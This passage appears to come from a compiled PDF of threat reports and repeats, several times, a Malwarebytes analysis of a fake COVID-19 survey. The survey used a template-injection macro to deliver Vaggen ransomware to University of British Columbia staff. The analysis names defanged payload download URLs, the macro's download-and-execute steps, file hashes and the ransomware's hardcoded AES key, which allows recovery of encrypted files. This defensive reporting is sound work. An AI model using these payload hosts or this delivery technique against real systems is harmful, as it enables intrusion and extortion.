mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2065 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2066 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2067 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2068 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2069 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2070 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2071 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2072 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the shell function to execute killar.exe
Checks the return value of the shell function to see whether it was successful (the return value is the task ID of the executed application)
If successful, it sends a GET HTTP request to: canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn’t successful, it sends a GET HTTP request to: canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted to a particular event. This can be very useful as an early warning system that an intruder has had access to a network. In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using the library xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is deployed as the callback of the standard Golang function path.filepath.Walk.

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here. It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.

The content of the output file (with the .VAGGEN extension) contains:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.
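The recovery described above, as an added Go example that is not code from the post or from the malware: a .VAGGEN file is split into the 12-byte nonce and the ciphertext-plus-16-byte-tag that gcm.Seal produces, then opened with the hardcoded key, and the .VAGGEN suffix is stripped from the name. The blob it decrypts is a fixture constructed inside the program, and the file name and content are made up.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"strings"
)

// The 32-byte key the post reports finding hardcoded in the binary; a
// 32-byte key selects AES-256 in aes.NewCipher.
const hardcodedKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	nonceSize = 12 // GCM nonce stored at the start of each .VAGGEN file
	tagSize   = 16 // GCM tag that gcm.Seal appends after the ciphertext
	vaggenExt = ".VAGGEN"
)

// splitVaggen separates the on-disk layout described in the post:
// nonce (12 bytes) || ciphertext || tag (16 bytes). Because Seal writes
// the tag directly after the ciphertext, everything after the nonce is
// handed to Open as one buffer.
func splitVaggen(blob []byte) (nonce, sealed []byte, err error) {
	if len(blob) < nonceSize+tagSize {
		return nil, nil, errors.New("file too short to hold a nonce and a GCM tag")
	}
	return blob[:nonceSize], blob[nonceSize:], nil
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// decryptVaggen recovers one file's plaintext. Open verifies the GCM tag,
// so a wrong key, a truncated file or a corrupted byte fails cleanly
// instead of producing garbage.
func decryptVaggen(blob, key []byte) ([]byte, error) {
	nonce, sealed, err := splitVaggen(blob)
	if err != nil {
		return nil, err
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	plain, err := gcm.Open(nil, nonce, sealed, nil)
	if err != nil {
		return nil, fmt.Errorf("authentication failed (wrong key or damaged file): %w", err)
	}
	return plain, nil
}

// restoreName undoes the rename by stripping the appended extension.
func restoreName(name string) string {
	return strings.TrimSuffix(name, vaggenExt)
}

// makeFixture builds a constructed blob in the same nonce||ciphertext||tag
// layout so the decryptor can be exercised offline. It is a test fixture
// for this demo, not a sample of the malware's output.
func makeFixture(plaintext, key []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return append(nonce, gcm.Seal(nil, nonce, plaintext, nil)...), nil
}

func main() {
	key := []byte(hardcodedKey)
	// Constructed content and file name for the demo.
	blob, err := makeFixture([]byte("quarterly budget figures"), key)
	if err != nil {
		panic(err)
	}
	plain, err := decryptVaggen(blob, key)
	if err != nil {
		panic(err)
	}
	encrypted := "budget.xlsx" + vaggenExt
	fmt.Printf("%s -> %s: %q\n", encrypted, restoreName(encrypted), plain)
}
```

Because the tag is authenticated, a file that was only partially written before the process was stopped is reported as damaged rather than silently restored with wrong contents.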
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2090 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2091 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2092 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately, instead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell function to determine whether it succeeded (on success the return value is the task ID of the launched application)\r\nIf successful, it sends an HTTP GET request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. The obfuscated names map to the following functionality:\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function: path.filepath.Walk.\r\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content: because the key is hardcoded in the binary and the nonce is stored in the encrypted file itself, nothing else is needed to reverse the encryption.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\n
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2136 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2137 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\